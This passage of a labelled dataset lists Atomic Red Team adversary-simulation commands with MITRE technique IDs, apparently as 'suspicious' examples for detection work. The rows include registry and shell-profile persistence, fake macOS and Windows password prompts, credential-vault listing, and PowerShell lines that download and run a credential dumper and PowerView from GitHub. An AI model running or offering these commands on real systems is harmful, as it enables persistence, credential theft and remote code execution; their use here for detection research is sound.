default, rdpclip is the value stored. An attacker with administrator privileges can alter the value stored to allow for the custom application to execute during RDP login session.The test will allow running cal rather rdpclip when a user logs in via RDP ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a5b19a464fe5f7d7fca58485,"reg add HKLM\System\CurrentControlSet\Control\BootVerificationProgram /v ImagePath /t REG_SZ /d ""#{malicious_file}""","reg add HKLM\System\CurrentControlSet\Control\BootVerificationProgram /v ImagePath /t REG_SZ /d ""#{malicious_file}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Creating Boot Verification Program Key for application execution during successful boot,T1547.001,"[""T1547.001""]",windows,0.9,False,"Microsoft allows users to define a custom boot verification program for those situations by creating the registry key “HKLM\System\CurrentControlSet\Control\BootVerificationProgram” and setting the value of ImagePath to the path of boot verification program.Threat Actor can abuse by creating this registry key and providing a malicious application to be executed during successful boot ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 37ed6a42a7f06f7dc2cdbe64,reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram /f,reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram /f,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Creating Boot Verification Program Key for application execution during successful boot,T1547.001,"[""T1547.001""]",windows,0.55,True,"Microsoft allows users to define a custom boot verification program for those situations by creating the registry key “HKLM\System\CurrentControlSet\Control\BootVerificationProgram” and setting the value of ImagePath to the path of boot verification program.Threat Actor can abuse by creating this registry key and providing a malicious application to be executed during successful boot ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 29f976dd2b633f05233dbb5c,"reg add ""HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"" /ve /t REG_SZ /d ""C:\Windows\System32\calc.exe"" /f","reg add ""HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"" /ve /t REG_SZ /d ""C:\Windows\System32\calc.exe"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Add persistence via Windows Context Menu,T1547.001,"[""T1547.001""]",windows,0.9,False,"This atomic test add persistence taking advantage of the Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/) User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify). ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eefd0334b62bf1221e206cb5,"reg delete ""HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify"" /f","reg delete ""HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Add persistence via Windows Context Menu,T1547.001,"[""T1547.001""]",windows,0.55,True,"This atomic test add persistence taking advantage of the Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/) User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify). ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eaddf040ed085e4238084bf7,"echo ""#{script_command}"" > #{script_path} REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d ""#{script_path}"" /f","echo ""#{script_command}"" > #{script_path} REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d ""#{script_path}"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1037.001/T1037.001.yaml,Logon Scripts,T1037.001,"[""T1037.001""]",windows,0.9,False,"Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bef2763315a4a745689598d2,"REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 del #{script_path} >nul 2>&1 del ""%USERPROFILE%\desktop\T1037.001-log.txt"" >nul 2>&1","REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 del #{script_path} >nul 2>&1 del ""%USERPROFILE%\desktop\T1037.001-log.txt"" >nul 2>&1",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1037.001/T1037.001.yaml,Logon Scripts,T1037.001,"[""T1037.001""]",windows,0.55,True,"Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 83310133878b0d0f2059d114,"vaultcmd /listcreds:""Windows Credentials""","vaultcmd /listcreds:""Windows Credentials""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555.004/T1555.004.yaml,Access Saved Credentials via VaultCmd,T1555.004,"[""T1555.004""]",windows,0.9,False,"List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d87fcfe45d24d1bcdcae8b94,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1') Invoke-WCMDump,iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1') Invoke-WCMDump,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1555.004/T1555.004.yaml,WinPwn - Loot local Credentials - Invoke-WCMDump,T1555.004,"[""T1555.004""]",windows,0.9,False,Loot local Credentials - Invoke-WCMDump technique via function of WinPwn,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c15c0c95a4316a170bdcfd3b,"osascript -e 'tell app ""System Preferences"" to activate' -e 'tell app ""System Preferences"" to activate' -e 'tell app ""System Preferences"" to display dialog ""Software Update requires that you type your password to apply changes."" & return & return default answer """" with icon 1 with hidden answer with title ""Software Update""'","osascript -e 'tell app ""System Preferences"" to activate' -e 'tell app ""System Preferences"" to activate' -e 'tell app ""System Preferences"" to display dialog ""Software Update requires that you type your password to apply changes."" & return & return default answer """" with icon 1 with hidden answer with title ""Software Update""'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.002/T1056.002.yaml,AppleScript - Prompt User for Password,T1056.002,"[""T1056.002""]",macos,0.9,False,"Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 241531656a9dd4287044549a,"# Creates GUI to prompt for password. Expect long pause before prompt is available. $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName) # Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework. write-warning $cred.GetNetworkCredential().Password","# Creates GUI to prompt for password. Expect long pause before prompt is available. $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName) # Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework. write-warning $cred.GetNetworkCredential().Password",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.002/T1056.002.yaml,PowerShell - Prompt User for Password,T1056.002,"[""T1056.002""]",windows,0.9,False,"Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 46c814ab765c24a756efc4e7,"PWD_SPOOF=$(osascript -e 'display dialog ""To perform a security update MacOS needs your passphrase."" with title ""MacOS Security Update"" default answer """" with icon stop with hidden answer') echo $PWD_SPOOF","PWD_SPOOF=$(osascript -e 'display dialog ""To perform a security update MacOS needs your passphrase."" with title ""MacOS Security Update"" default answer """" with icon stop with hidden answer') echo $PWD_SPOOF",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.002/T1056.002.yaml,AppleScript - Spoofing a credential prompt using osascript,T1056.002,"[""T1056.002""]",macos,0.9,False,"Prompt user for password without requiring permissions to send Apple events to System Settings. https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6db13ac6c006f3ee8475e4bf,kubectl get cronjobs -n #{namespace},kubectl get cronjobs -n #{namespace},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1053.007/T1053.007.yaml,ListCronjobs,T1053.007,"[""T1053.007""]",containers,0.9,False,"Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fe11dd7235ffd5879ec8a766,kubectl create -f src/cronjob.yaml -n #{namespace},kubectl create -f src/cronjob.yaml -n #{namespace},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1053.007/T1053.007.yaml,CreateCronjob,T1053.007,"[""T1053.007""]",containers,0.9,False,"Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4a9cbd1b882e0e3ee5c1f3f1,kubectl delete cronjob art -n #{namespace},kubectl delete cronjob art -n #{namespace},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1053.007/T1053.007.yaml,CreateCronjob,T1053.007,"[""T1053.007""]",containers,0.55,True,"Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6c38f06b7ea87267e024eea1,echo '#{command_to_add}' >> ~/.bash_profile,echo '#{command_to_add}' >> ~/.bash_profile,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Add command to .bash_profile,T1546.004,"[""T1546.004""]","macos,linux",0.9,False,"Adds a command to the .bash_profile file of the current user ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 097b065ae4bf25e58f3f8dd6,head -n '-2' ~/.bash_profile > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bash_profile,head -n '-2' ~/.bash_profile > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bash_profile,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Add command to .bash_profile,T1546.004,"[""T1546.004""]","macos,linux",0.55,True,"Adds a command to the .bash_profile file of the current user ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2846db307914ad75b5c709db,echo '#{command_to_add}' >> ~/.bashrc,echo '#{command_to_add}' >> ~/.bashrc,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Add command to .bashrc,T1546.004,"[""T1546.004""]","macos,linux",0.9,False,"Adds a command to the .bashrc file of the current user ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6349dc4e27892aba3c77d6e1,head -n '-2' ~/.bashrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bashrc,head -n '-2' ~/.bashrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bashrc,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Add command to .bashrc,T1546.004,"[""T1546.004""]","macos,linux",0.55,True,"Adds a command to the .bashrc file of the current user ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 65e6c58bf06add6571a0063a,echo '#{command_to_add}' >> ~/.shrc,echo '#{command_to_add}' >> ~/.shrc,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Add command to .shrc,T1546.004,"[""T1546.004""]",linux,0.9,False,"Adds a command to the .shrc file of the current user ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 26ed47cbe47a8eaa632b5171,head -n '-2' ~/.shrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.shrc,head -n '-2' ~/.shrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.shrc,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Add command to .shrc,T1546.004,"[""T1546.004""]",linux,0.55,True,"Adds a command to the .shrc file of the current user ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 38a1fecb179c13e7239e54c3,echo '#{text_to_append}' >> /etc/profile,echo '#{text_to_append}' >> /etc/profile,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Append to the system shell profile,T1546.004,"[""T1546.004""]",linux,0.9,False,"An adversary may wish to establish persistence by executing malicious commands from the systems /etc/profile every time ""any"" user logs in. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f0287614fefcd5ae41561d64,"sed -i ""s/# Atomic Red Team was here! T1546.004//"" /etc/profile","sed -i ""s/# Atomic Red Team was here! T1546.004//"" /etc/profile",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Append to the system shell profile,T1546.004,"[""T1546.004""]",linux,0.55,True,"An adversary may wish to establish persistence by executing malicious commands from the systems /etc/profile every time ""any"" user logs in. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 45180a9a0cc0c346428881cb,echo '#{text_to_append}' >> ~/.profile,echo '#{text_to_append}' >> ~/.profile,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Append commands user shell profile,T1546.004,"[""T1546.004""]",linux,0.9,False,"An adversary may wish to establish persistence by executing malicious commands from the users ~/.profile every time the ""user"" logs in. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4d6ccba67eee9dedf9e3f121,"sed -i ""s/# Atomic Red Team was here... T1546.004//"" ~/.profile","sed -i ""s/# Atomic Red Team was here... T1546.004//"" ~/.profile",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Append commands user shell profile,T1546.004,"[""T1546.004""]",linux,0.55,True,"An adversary may wish to establish persistence by executing malicious commands from the users ~/.profile every time the ""user"" logs in. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5d5f63b2b0244b719b0563f9,echo '#{text_to_append}' >> /etc/profile.d/bash_completion.sh,echo '#{text_to_append}' >> /etc/profile.d/bash_completion.sh,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,System shell profile scripts,T1546.004,"[""T1546.004""]",linux,0.9,False,"An adversary may wish to establish persistence by adding commands into any of the script files in the /etc/profile.d/ directory, which are executed every time ""any"" user logs in. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 561e5a1c756120a4e165cc75,"sed -i ""s/# Atomic Red Team was here... T1546.004//"" /etc/profile.d/bash_completion.sh","sed -i ""s/# Atomic Red Team was here... T1546.004//"" /etc/profile.d/bash_completion.sh",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,System shell profile scripts,T1546.004,"[""T1546.004""]",linux,0.55,True,"An adversary may wish to establish persistence by adding commands into any of the script files in the /etc/profile.d/ directory, which are executed every time ""any"" user logs in. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6eac36deebe4bf288601d6e1,"useradd --create-home --shell /bin/bash art su -l art -c ""echo 'echo \""Atomic Red Team was here... T1546.004\"" >> /home/art/art.txt' >> /home/art/.bash_logout; exit""","useradd --create-home --shell /bin/bash art su -l art -c ""echo 'echo \""Atomic Red Team was here... T1546.004\"" >> /home/art/art.txt' >> /home/art/.bash_logout; exit""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Create/Append to .bash_logout,T1546.004,"[""T1546.004""]",linux,0.9,False,"The Bash shell runs ~/.bash_logout ""if it exists"" to run commands on user logout. An adversary may create or append to a .bash_logout to clear history, start processes etc. Note the ~/.bash_logout is only run if you explicitly exit or log out of an ""interactive login shell session"" i.e. via the console, SSH, /bin/bash -l or su -l . This test creates the art user, logs in, creates a .bash_logout which will echo some text into the art.txt file on logout and logs out and the /home/art/a",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 994d6750f170e0dd5557fb68,userdel -fr art,userdel -fr art,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1546.004/T1546.004.yaml,Create/Append to .bash_logout,T1546.004,"[""T1546.004""]",linux,0.55,True,"The Bash shell runs ~/.bash_logout ""if it exists"" to run commands on user logout. An adversary may create or append to a .bash_logout to clear history, start processes etc. Note the ~/.bash_logout is only run if you explicitly exit or log out of an ""interactive login shell session"" i.e. via the console, SSH, /bin/bash -l or su -l . This test creates the art user, logs in, creates a .bash_logout which will echo some text into the art.txt file on logout and logs out and the /home/art/a",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 657bfda3da8f72f89cd1d894,driverquery /v /fo list driverquery /si /fo list,driverquery /v /fo list driverquery /si /fo list,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1652/T1652.yaml,Device Driver Discovery,T1652,"[""T1652""]",windows,0.9,False,"Displays a list of installed device drivers on the local computer and their properties. Threat actors use this command to enumerate the existing drivers on the computer. Parameters: /v /fo list - Displays verbose output in a list format - the /v parameter is not valid for signed drivers /si /fo list - Provides information about signed drivers and outputs it in a list format ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 876d804d78653cf1c83abf96,"find /lib/modules/$(uname -r)/kernel/drivers -name ""*.ko*""","find /lib/modules/$(uname -r)/kernel/drivers -name ""*.ko*""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1652/T1652.yaml,Enumerate Kernel Driver Files (Linux),T1652,"[""T1652""]",linux,0.9,False,"Finds and lists all kernel driver files on a Linux system in order to provide a broader view of available drivers, not just loaded ones. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3e59c90c856830cacb19cb11,"IEX (iwr ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso"" -OutFile ""$env:TEMP\qbot-test.iso"") Mount-DiskImage -ImagePath ""$env:TEMP\qbot-test.iso"" $mountedpath = (Get-DiskImage -ImagePath ""$env:TEMP\qbot-test.iso"" | Get-Volume).DriveLetter $finalpath = $mountedpath + "":\"" cd $finalpath .\calc.exe.lnk","IEX (iwr ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso"" -OutFile ""$env:TEMP\qbot-test.iso"") Mount-DiskImage -ImagePath ""$env:TEMP\qbot-test.iso"" $mountedpath = (Get-DiskImage -ImagePath ""$env:TEMP\qbot-test.iso"" | Get-Volume).DriveLetter $finalpath = $mountedpath + "":\"" cd $finalpath .\calc.exe.lnk",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1204.003/T1204.003.yaml,Malicious Execution from Mounted ISO Image,T1204.003,"[""T1204.003""]",windows,0.9,False,Adversaries may rely on a user running a malicious image to facilitate execution,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3a408576f4db55f810a9d6c6,"start-sleep -s 5 stop-process -Name ""Calculatorapp"" -Force dismount-diskimage -ImagePath ""$env:TEMP\qbot-test.iso""","start-sleep -s 5 stop-process -Name ""Calculatorapp"" -Force dismount-diskimage -ImagePath ""$env:TEMP\qbot-test.iso""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1204.003/T1204.003.yaml,Malicious Execution from Mounted ISO Image,T1204.003,"[""T1204.003""]",windows,0.55,True,Adversaries may rely on a user running a malicious image to facilitate execution,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cab1c060ff378250fdcbdda5,cat /etc/pam.d/common-password,cat /etc/pam.d/common-password,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Examine password complexity policy - Ubuntu,T1201,"[""T1201""]",linux,0.9,False,"Lists the password complexity policy to console on Ubuntu Linux. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b2cf80fc797d326927df7c5e,cat /etc/pam.d/passwd,cat /etc/pam.d/passwd,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Examine password complexity policy - FreeBSD,T1201,"[""T1201""]",linux,0.9,False,"Lists the password complexity policy to console on FreeBSD. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a708a9f5aa75dfac0deceb5a,cat /etc/security/pwquality.conf,cat /etc/security/pwquality.conf,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Examine password complexity policy - CentOS/RHEL 7.x,T1201,"[""T1201""]",linux,0.9,False,"Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3de2e17e867c6b8f4a581397,cat /etc/pam.d/system-auth cat /etc/security/pwquality.conf,cat /etc/pam.d/system-auth cat /etc/security/pwquality.conf,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Examine password complexity policy - CentOS/RHEL 6.x,T1201,"[""T1201""]",linux,0.9,False,"Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1eba7ec9b46307225f6c038f,cat /etc/login.defs,cat /etc/login.defs,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Examine password expiration policy - All Linux,T1201,"[""T1201""]",linux,0.9,False,"Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 46422aa87446e0fd5b95c3c7,net accounts,net accounts,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Examine local password policy - Windows,T1201,"[""T1201""]",windows,0.9,False,"Lists the local password policy to console on Windows. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 05b548546eb4d6bca1105896,net accounts /domain,net accounts /domain,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Examine domain password policy - Windows,T1201,"[""T1201""]",windows,0.9,False,"Lists the domain password policy to console on Windows. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bdaa8d428ec50e4eca2fdbe4,pwpolicy getaccountpolicies,pwpolicy getaccountpolicies,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Examine password policy - macOS,T1201,"[""T1201""]",macos,0.9,False,"Lists the password policy to console on macOS. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f601124e6e58f6858ca8ff0a,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Get-DomainPolicy with PowerView,T1201,"[""T1201""]",windows,0.9,False,"Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b05de7f7f894d76d5cc3a5fa,secedit.exe /export /areas SECURITYPOLICY /cfg output_mysecpol.txt,secedit.exe /export /areas SECURITYPOLICY /cfg output_mysecpol.txt,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Use of SecEdit.exe to export the local security policy (including the password policy),T1201,"[""T1201""]",windows,0.9,False,"SecEdit.exe can be used to export the current local security policy applied to a host. [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ebf3876baf195d277283f720,aws iam get-account-password-policy,aws iam get-account-password-policy,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1201/T1201.yaml,Examine AWS Password Policy,T1201,"[""T1201""]",iaas:aws,0.9,False,"This atomic test will display details about the password policy for the current AWS account. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 83d28eee557dae46ae7def10,"net stop w32time Copy-Item ""$PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll"" C:\Users\Public\AtomicTest.dll reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest"" /t REG_SZ /v ""DllName"" /d ""C:\Users\Public\AtomicTest.dll"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest"" /t REG_DWORD /v ""Enabled"" /d ""1"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest"" /t REG_DWORD /v ""InputProvider"" /d ""1"" /f net start w32time","net stop w32time Copy-Item ""$PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll"" C:\Users\Public\AtomicTest.dll reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest"" /t REG_SZ /v ""DllName"" /d ""C:\Users\Public\AtomicTest.dll"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest"" /t REG_DWORD /v ""Enabled"" /d ""1"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest"" /t REG_DWORD /v ""InputProvider"" /d ""1"" /f net start w32time",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.003/T1547.003.yaml,Create a new time provider,T1547.003,"[""T1547.003""]",windows,0.9,False,"Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful. Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review df342f2a7bbaf50f9c244d1a,"net stop w32time reg delete ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest"" /f rm -force C:\Users\Public\AtomicTest.dll net start w32time","net stop w32time reg delete ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest"" /f rm -force C:\Users\Public\AtomicTest.dll net start w32time",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.003/T1547.003.yaml,Create a new time provider,T1547.003,"[""T1547.003""]",windows,0.55,True,"Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful. Payload source code: 